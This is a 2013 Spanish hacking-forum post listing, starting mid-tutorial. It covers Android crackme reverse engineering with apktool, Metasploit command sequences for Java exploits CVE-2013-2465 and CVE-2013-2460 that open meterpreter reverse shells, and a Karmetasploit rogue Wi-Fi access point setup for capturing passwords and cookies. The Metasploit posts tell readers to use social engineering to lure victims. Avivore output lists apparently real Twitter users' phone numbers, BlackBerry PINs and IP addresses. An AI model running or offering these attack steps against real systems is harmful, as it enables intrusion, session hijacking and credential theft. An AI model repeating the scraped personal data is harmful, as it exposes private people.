Target: Es el api que utilizaremos para ejecutar la máquina virtual es decir, como si fuera la versión de Android. Recomiendo de momento la "API Level 8″ o Android 2.2 que es lo mismo

Lo demás ya se configura una vez hemos seleccionado el api, pero si queremos parámetros adicionales podemos explorar la herramienta. Por último le damos a Create AVD.


Listo ahora la seccionamos en el listado y en la parte derecha le damos "Start" y "Launch". Se empezará a cargar la nueva unidad virtual lo que puede tardar varios minutos así que debemos ser pacientes en este paso. Cuando arranque veremos una pantalla como si fuese un móvil Android, con el sistema operativo completamente funcional. Pero como lo que vamos a hacer es un proceso de ingeniería inversa necesitaremos probar la aplicación, por lo que surge la necesidad de instalar aplicaciones APK en esta nueva unidad virtual.

Lo base para esto será saber que las aplicaciones Android se deben copiar a la carpeta "platform-tools" por ejemplo, la mía está en C:\Android SDK\android-sdk-windows\platform-tools, esto porque allí hay una herramienta llamada ADB (Android Debug Bridge) la cual es una herramienta que funciona por línea de comandos y que también sirve de conexión de nuestro móvil al ordenador y realizar tareas desde allí

En esta ocasión la utilizaremos para instalar APKs, por lo que una vez copiado el APK al directorio "Platform-tools" debemos ejecutar (con el emulador abierto):

adb install fichero.apk o para desinstalar adb uninstall fichero


Ahora si todo ha salido bien veremos la aplicación instalada en el emulador. Por cierto, algo importante a tener en cuenta es que el emulador o unidad virtual debe estar ejecutándose al momento de realizar este proceso de instalación del APK.

Instalar y usar ApkTool

Con el proceso anterior aprendimos a probar los APK. Bien, olvidemos por un rato eso y ahora iniciemos con el proceso de "ingeniería inversa" como tal. En esta ocasión usaremos APKTool, que básicamente sirve para cambiar algunas cosas de las aplicaciones Android pero además de ensamblar y desensamblarlas, que es nuestro uso principal en esta ocasión.

Para instalar APKTool deberemos bajar tanto el fichero apktool.jar (el principal) y si estamos en Windows debemos bajar las dependencias, veamos el proceso paso a paso mejor:

    Descargar APKTool y dependencias (apktool1.4.1.tar.bz2 y apktool-install-windows-r04-brut1.tar.bz2).
    Descomprimir todo en una sola carpeta.
    Copiar estos ficheros al directorio principal de Windows, es decir, C:\Windows.

Listo ahora podemos ejecutar desde la consola de Windows el APKTool (Tecla Windows + R > cmd > Tecleamos apktool para ver todos sus parámetros). Para continuar con dicho proceso deberemos generar nuestro bytecode o fuentes en código de bajo nivel. Para "decompilar" nos ubicamos en la carpeta del APK y tecleamos en la consola:

apktool d fichero.apk nombre_nuevo_sin_extension

En la consola sería algo como esto:


Ya "desensamblamos" todo por lo que si revisamos la carpeta de nuestro APK hay un nuevo directorio el cual tiene el mismo nombre que le especificamos en la línea de comandos hace un momento. Lo que contiene son los ficheros fuente, el AndroidManifest.xml, entre otros recursos Lo que nos interesa es la carpeta smali, donde están los fuentes.

Si revisamos dicha carpeta y los ficheros generados, veremos unos archivos con extensión .smali, y lo primero que noto es un archivo llamado "main.smali", pues sí, el código en lenguaje de bajo nivel.

En el tomo nº 1 de esta guía básica compartí un "crackme" o una aplicación Android que pedia un usuario y contraseña, no era más que una comparación de strings. Supongamos ahora que estamos revisando dicha aplicación y nos ponemos a buscar el mensaje de error que muestra cuando el usuario y contraseña son incorrectos.


Usaré ahora un editor de textos, de forma intuitiva uso el buscador para encontrar este mensaje y revisando un poco el código encuentro una comparación de strings, que no representan más que dicha comparación de usuario y contraseña. Pero estos string están declarados en un OPCode llamado const-string, por lo que ya sabemos la importancia de reconocerlos y que para buscar cadenas está el OPCode const-string.

Ahora, esto quiere decir que si cambio el const-string y la cadena encontrada en la comparación podré modificar los datos de acceso a la aplicación, si pongo por ejemplo "123" como contraseña podremos ver que pasa (sabiendo que la contraseña actual es "2014″ y el nombre de usuario como se puede ver es "ricadmin"):


Una vez modificado el siguiente paso será empaquetar nuevamente nuestro fichero APK, por lo que abrimos una consola de comandos, nos ubicamos en la carpeta donde estábamos trabajando y tecleamos:

apktool b carpeta_de_trabajo ficherocompilado.apk

Nótese que anteriormente yo había "desensamblado" y le llamé a mi carpeta "debug-crackmetest". Tengan muy en cuenta los espacios que hay entre colocar el nombre de la carpeta y el del nuevo fichero compilado.

Y listo, con eso habremos generado un nuevo fichero APK con el nombre que le hemos acabado de poner (aparece en la misma carpeta de trabajo).


Firmando la aplicación o "generando certificados"

Es importante decirle a Android que nuestro APK en realidad si se trata de una aplicación para Android, pues estos tienen ciertas características que el sistema lee antes de su ejecución como tal.

Para esta tarea usaremos el "testsign.jar" una utilidad escrita para dicha finalidad y que podemos bajar en para empezar a usarla debemos colocarla en la misma carpeta de nuestro APK recién compilado y en la consola escribimos:

java -classpath testsign.jar testsign compilado-firmado.apk

Tener en cuenta que esto se le aplica a nuestro APK recién compilado. Si todo sale bien no saldrá nada por pantalla:


Generar un APK apto para Android

Listo, con el paso anterior "firmamos" la aplicación, ahora debemos optimizar el nuevo APK con una herramienta llamada "zipalign" que se encuentra en la carpeta "tools" de donde tenemos instalado el Android SDK.

El siguiente paso será copiar nuestro APK recién firmado a la carpeta "tools" que es donde se encuentra la aplicación "zipalign", abrimos una consola, nos ubicamos en el directorio donde está la aplicación y nuestro fichero recién copiado y tecleamos:

zipalign -f 4 fichero-compilado.apk fichero-final.pak


Si todo sale bien tampoco saldrá nada. Ahora solo nos queda probar la aplicación y que los cambios se hayan realizado funcionen. Por lo que nuestro "fichero-final.apk" lo copiamos a "platform-tools" para instalarlo en nuestra unidad virtual que debe estar ejecutándose (por lo que en la consola escribimos "adb install fichero-final.apk"). Y el resultado es:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#32

Formatos de archivo .DEX y .JAR

Como sabemos la mayoría de aplicaciones para Android están programadas en Java, los ejecutables de este sistema operativo tienen una extensión de tipo .APK, hasta aquí todo bien, pero debemos saber que esta extensión no es más que una variación de la extensión .JAR, por lo que si alguna vez hemos programado en Java sabemos que los .JAR funcionan como una especie de contenedor con varios archivos adentro, por lo que con cualquier compresor podemos extraer su contenido y ver una serie de archivos que son los que componen la aplicación.

Por lo tanto, si a una aplicación Android  (.APK) le extraemos los ficheros con un compresor cualquiera podremos ver todos los ficheros que componen la aplicación:


Uno de estos archivos es classes.dex que será uno de los más importantes pues este es el que contiene las clases y todo el código en general de la aplicación.
Herramientas necesarias

Como mencionábamos más arriba, en Windows para poder ver el código en ensamblador de un archivo con extensión .exe usábamos el OllyDB, en esta ocasión haremos uso de una serie de herramientas que harán lo mismo y con esto podremos ver el código Java.

El proceso será sencillo, pasaremos el archivo .dex a .jar y luego descompilaremos este último. Para esto necesitaremos:

JD-GUI: Es una aplicación con interfaz gráfica muy intuitiva con la que podremos ver el código fuente de los archivos .class (básicamente .jar de Java). Con  esta herramienta podremos ver clases, métodos y otros componentes del programa. Web oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Dex2Jar: Como su nombre nos lo dice, permite pasar de .dex a .jar, podemos usarlo individualmente o en conjunto con las herramientas que nombraremos aquí. Web oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Eclipse: Es un IDE de desarrollo para varias plataformas y que funciona con java. Web oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Configurar .Dex2Jar en Eclipse

Lo primero será configurar un nuevo proyecto, por lo que vamos a File > New > Java Proyect, le ponemos un nombre al proyecto y damos a finalizar.


Seleccionamos nuestro proyecto en explorador de paquetes, luego estando seleccionado vamos al menú Project > Properties > Java Build Path. Allí en la pestaña "Libraries" damos click en "Add external Jars", allí en la ventana que sale ubicamos la carpeta de Dex2Jar y añadimos todos los .Jar de la carpeta a nuestro proyecto y seleccionamos Ok.


Ahora añadimos nuestro fichero .APK al proyecto, es decir, lo arrastramos hasta el explorador de  paquetes.


Ahora hacemos click derecho en la carpeta de nuestro proyecto, seleccionamos Run As > Run Configurations y hacemos doble click en "Java application", por lo que se añadirá una especie de página en la cual podemos pasar argumentos.

Aquí en la pestaña "Main"añadimos el nombre de la clase Main de Dex2Jar, la cual es posible encontrarla haciendo click en el botón "search" de la misma pestaña, en mi caso tiene una estructura así: com.googlecode.dex2jar.v3.Main


Luego vamos a la pestaña arguments y en la primera caja de texto colocamos el nombre de nuestro fichero APK con la extensión:


Damos click en Aplicar (Apply) y luego en "Run", para ver un resultado de este tipo:


Ahora actualizamos nuestro explorador de proyectos (Click derecho y luego le damos "Refresh") y veremos un nuevo fichero con extensión .Jar, es el que necesitábamos.


Descompilar archivos .JAR

Con el proceso anterior obtuvimos un .JAR limpio, ahora debemos "decompilarlo" para así poder ver su código fuente, por lo que abrimos el JD-GUI y allí abrimos nuestro .JAR generado, lo primero que observo son los métodos y en especial uno que dice button1_click(), ya que de seguro allí habrá algo.


Pero bueno, ya a partir de aquí podemos seguir e investigar todo el código, obviamente los conocimientos de programación nunca están demás para entender los algoritmos implicados en la aplicación.

Crackme

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#33
Hacking / CVE-2013-2465
Agosto 23, 2013, 01:57:06 AM

CVE-2013-2465 - Java storeImageArray() Invalid Array Indexing

Este módulo de Metasploit abusa de la vulneravilidad matriz indexación no válida en la función storeImageArray() de la función estática para producir una corrupción de memoria y finalmente evadir el Sandbox de Java. La vulnerabilidad afecta a Java versión 7u21 y versiones anteriores.


Explotando CVE-2013-2465 con mestasploit:

// Cargamos el módulo
Código: php

msf > use exploit/multi/browser/java_storeimagearray

msf exploit(java_storeimagearray) > set PAYLOAD java/meterpreter/reverse_tcp

msf exploit(java_storeimagearray) > set LHOST [IP Local]

msf exploit(java_storeimagearray) > set srvhost [IP Local]

msf exploit(java_storeimagearray) > set uripath /

msf exploit(java_storeimagearray) > exploit


Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.

Saludos, \0/
#34
Hacking / Avivore
Agosto 20, 2013, 04:36:19 PM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es una sencilla herramienta programada en lenguaje Python que, utilizando la API de Twitter, busca determinadas palabras clave para analizar los tweets encontrados y extraer información relativa a:

1) Números de teléfono en el formato internacional de marcación NPA-NXX (por ejemplo, 604-555-5555).
2) Direcciones IP en formato IPv4 (127.0.0.1).
3) Códigos PIN de dispositivos Blackberry (ABCDEF12) para utilizar con Blackberry Messenger (BBM), un servicio similar al conocido Whatsapp.

Todo lo anterior se almacena en una base de datos SQLite (.db) y va mostrando los resultados uno a uno de forma secuencial a través de la consola. En la página del creador se indica que la herramienta ha sido probada en Ubuntu pero que debería funcionar en cualquier otra plataforma capaz de ejecutar Python. En el laboratorio de Hacktimes se ha instalado bajo una distribución Linux Debian Squeeze y, una vez configurado Python adecuadamente, no ha surgido ningún problema con los módulos de Twitter y Sqlite.

Avivore fue presentado en las conferencias de Seguridad B-Sides de Vancouver a principios de marzo de este año 2013 (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) y desde entonces el autor está recopilando ideas para darle nuevos usos a la herramienta y así obtener más información de los usuarios que publican alegremente demasiados datos en Twitter.

La instalación es simple.

Citarapt-get install sqlite3
curl -O No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
python distribute_setup.py
curl -O No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
pip install twitter

Código: php
hacktimes_lab# python avivore.py

Avivore 1.0
A Twitter-based tool for finding personal data.

Licensed under the LGPL and created by Colin Keigher
http://github.com/ColinKeigher
--------------------------------------------------------

[1365009816] Type: bbpin, User: DjAndresBass, PIN: 2908ABFB, TweetID: 319498790010757121
[1365009816] Type: bbpin, User: 1Okonma, PIN: 26580A0F, TweetID: 319498775104204800
[1365009816] Type: bbpin, User: kopyrit3, PIN: 28B39095, TweetID: 319498184776896512
[1365009816] Type: bbpin, User: AlbaraaNagro, PIN: 271FE0FA, TweetID: 319497093121196032
[1365009826] Type: bbpin, User: shantisusantii, PIN: 284f70a8, TweetID: 319500427693527040
[1365009826] Type: phone, User: soloventasEC, Number: 6660986790, TweetID: 319500381421969410
[1365009826] Type: bbpin, User: shantisusantii, PIN: 284f70a8, TweetID: 319500309141536768
[1365009826] Type: phone, User: Diegoleon007, Number: 3044680505, TweetID: 319500240979890177
[1365009826] Type: bbpin, User: shantisusantii, PIN: 284f70a8, TweetID: 319500216288043008
[1365009857] Type: phone, User: bitch_suck_des, Number: 7343772865, TweetID: 319500316884226048
[1365009867] Type: phone, User: CDFMS, Number: 6628417855, TweetID: 319500569897209856
[1365009867] Type: phone, User: NickRizzi_, Number: 7184905119, TweetID: 319500566948614144
[1365009888] Type: ipadr, User: Africanex, IP: 76.64.191.184, TweetID: 319500002735042562
[1365009888] Type: ipadr, User: Africanex, IP: 70.26.36.130, TweetID: 319499562706423809
[1365009888] Type: ipadr, User: Africanex, IP: 99.232.57.192, TweetID: 319499553558626304
[1365009919] Type: bbpin, User: shantisusantii, PIN: 284f70a8, TweetID: 319500792157593601
[1365009919] Type: bbpin, User: elmejor1393, PIN: 24427bb7, TweetID: 319500680417120257
[1365009919] Type: bbpin, User: gngstryuri, PIN: 284f70a8, TweetID: 319500673769160705
[1365009919] Type: bbpin, User: shantisusantii, PIN: 284f70a8, TweetID: 319500642018275331
#35
Hacking / Viproy - VoIP Penetration Testing Kit
Agosto 12, 2013, 12:34:43 AM

Este Kit se ha desarrollado para mejorar las habilidades de los Pentester en los entornos de VoIP, en especial las pruebas de seguridad que se realizan para los procesos de autenticación.

VIPROY permite poner a prueba el sistema de autenticación, proporcionando de este modo un entrenamiento muy interesante para aquellos profesionales (Pentester) que se enfrenten a un test de penetración con infraestructura de VoIP.

Las pruebas o test que se incluyen en el Kit, son:

Options tester: manipulación de las opciones de comunicación en la VoIP, con el protoclo SIP se puede indicar el codec que se utiliza en la comunicación, así como el puerto de conexión. Se puede poner a prueba las opciones.

Brute force: Ataques de fuerza bruta en el proceso de identificación de cada teléfono/ usuario.

Enumerator: Se puede poner en practica la técnica de conseguir información sobre los usaurios y/o terminales de VoIP, que tiene el servidor registrados.

Invite tester: pruebas en el proceso de llamada de los usuarios de VoIP.

Trust analyzer, Proxy/Registration tester: evaluar la seguridad del proceso de registro y la comunicación a través de proxy.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#36
Hacking / Topera - Hacking IPv6 Tool
Agosto 11, 2013, 08:29:50 PM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es una nueva herramienta para auditoria de seguridad con características similares a Nmap pero que hace su incursión al mundo con la capacidad de ser el Escaner de Puertos Transparente ante Snort.

Snort es un Sistema de Detección de Intrusos (IDS) que notifica al Administrador de red sobre paquetes mal formados, escaneos y otros ataques, es una herramienta ideal e imprescindible en Servidores.

El escaner Topera se basa en el Protocolo de Internet versión 6 (IPv6) para explotar una vulnerabilidad presente aun y sin parchar en el IDS Snort.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#37
Cursos, manuales y libros / Hack The Stack
Agosto 04, 2013, 09:34:51 PM

Páginas: 480
Idioma: Inglés
Archivo: .PDF

Contenido:

    Chapter 1 Extending OSI to Network Security
    Chapter 2 The Physical Layer
    Chapter 3 Layer 2: The Data Link Layer
    Chapter 4 Layer 3: The Network Layer
    Chapter 5 Layer 4: The Transport Layer
    Chapter 6 Layer 5: The Session Layer
    Chapter 7 Layer 6: The Presentation Layer
    Chapter 8 Layer 7: The Application Layer
    Chapter 9 Layer 8: The People Layer

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#38
Hacking / Karmetasploit
Julio 03, 2013, 11:49:23 PM

Karmetasploit sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar infomación, y llevar a los ataques de navegador contralos clientes.

Cuando un usuario se conecta a nuestro AP Fake, la dirección IP la estará asignando el servicio DHCP, y posteriormente karmetasploit intentará ejecutar todos los exploits sobre la maquina objetivo en busca de alguna vulnerabilidad e intentará conseguir una sesión meterpreter.

Descargamos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Instalamos dhcpd3-server

Código: php
sudo apt-get install isc-dhcp-server


Una ves instalado procederemos a configurarlo, Quedando de la siguiente manera.

Código: php
#
# Sample configuration file for ISC dhcpd for Debian
#
# Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as
# configuration file instead of this file.
#
#

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "10.0.0.1";
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#}

# This is a very basic subnet declaration.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#  range 10.0.0.100 10.0.0.254;
#  option routers 10.0.0.1;
#}


Luego procedemos a editar /opt/backbox/msf/data/exploits/capture/http/sites.txt donde están almacenados todos los sitios en los que metasploit intentará robar cookies.

Ahora comenzamos poniendo nuestra tarjeta en modo monitor, en mi caso es la wlan0

Código: php
airmon-ng start wlan0


Se activará así la interfaz mon0 la cual podemos cambiarle la dirección MAC si lo creemos necesario:

Código: php
ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 up


Una vez que la interfaz está lista ya podemos crear nuestro punto de acceso con la ayuda de airbase-ng, tecleemos lo siguiente en la consola:

Código: php
airbase-ng -P -C 30 -c 6 -e "red_falsa" mon0


Donde mon0 es nuestra tarjeta en modo monitor y "red_falsa" es el nombre que queramos darle a nuestra red.

Este paso anterior nos creará una nueva interfaz llamada at0 a la cual vamos a darle una ip y activamos el servidor dhcp desde otra terminal:

Código: php
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd -cf /etc/dhcp/dhcpd.conf at0


Ahora iniciamos mestasploit con karma.

Código: php
msfconsole -r karma.rc


Al iniciar karmetasploit les aparecerá:

#39
Hacking / CVE-2013-2460
Julio 03, 2013, 12:25:45 PM

CVE-2013-2460 Java Applet ProviderSkeleton Insecure Invoke Method

Este módulo de Metasploit abusa el método inseguro invoke()  de la clase de ProviderSkeleton que permite para llamar a métodos estáticos arbitrarios con argumentos de usuario. La vulnerabilidad afecta a la versión Java 7u21 y versiones anteriores.


Explotando CVE-2013-2460 con mestasploit:

// Cargamos el módulo

Código: php
msf > use exploit/multi/browser/java_jre17_provider_skeleton

// Cargamos el payload para el meterpreter

msf exploit(java_jre17_provider_skeleton) > set PAYLOAD java/meterpreter/reverse_tcp

msf exploit(java_jre17_provider_skeleton) > set LHOST [IP Local]

msf exploit(java_jre17_provider_skeleton) > set srvhost [IP Local]

msf exploit(java_jre17_provider_skeleton) > set uripath /

msf exploit(java_jre17_provider_skeleton) > exploit


Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.

#40

X-Ways Forensics, es un avanzado entorno de trabajo para analistas forenses que funciona sobre plataformas Windows 2000 / XP / 2003 / Vista / Seven / 2008 con tecnologías de 32 y 64 Bits.

Algunas de las características de X-Ways Forensics son:

Posibilidad de crear imágenes o copiados seguros de evidencias digitales.
Recuperación de información eliminada.
Visualizar estructuras de directorios sobre imágenes del tipo .dd.
Acceder a discos, RAIDs, e imágenes de gran tamaño (2Tb).
Soporte nativo para FAT12, FAT16, FAT32, TFAT, NTFS, Ext2, Ext3, Ext4, CDFS/ISO9660/Jolite, UDF.
Visualización y volcado de memoria RAM y memoria virtual de procesos en ejecución.
Creación de medios forenses estériles.
Generación y cálculo de firmas criptográficas (CRC32, MD4, ed2k, MD5, SHA-1, SHA-256, RipeMD.
Capacidades de búsquedas en la evidencia recolectada.
Bookmarks.
Anotaciones y un largo etc.
Para más información sobre X-Ways Forensics visita su Web oficial No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Manual oficial de usuario para X-Ways forensics (pdf) No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

QuickStart Guide (pdf) No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta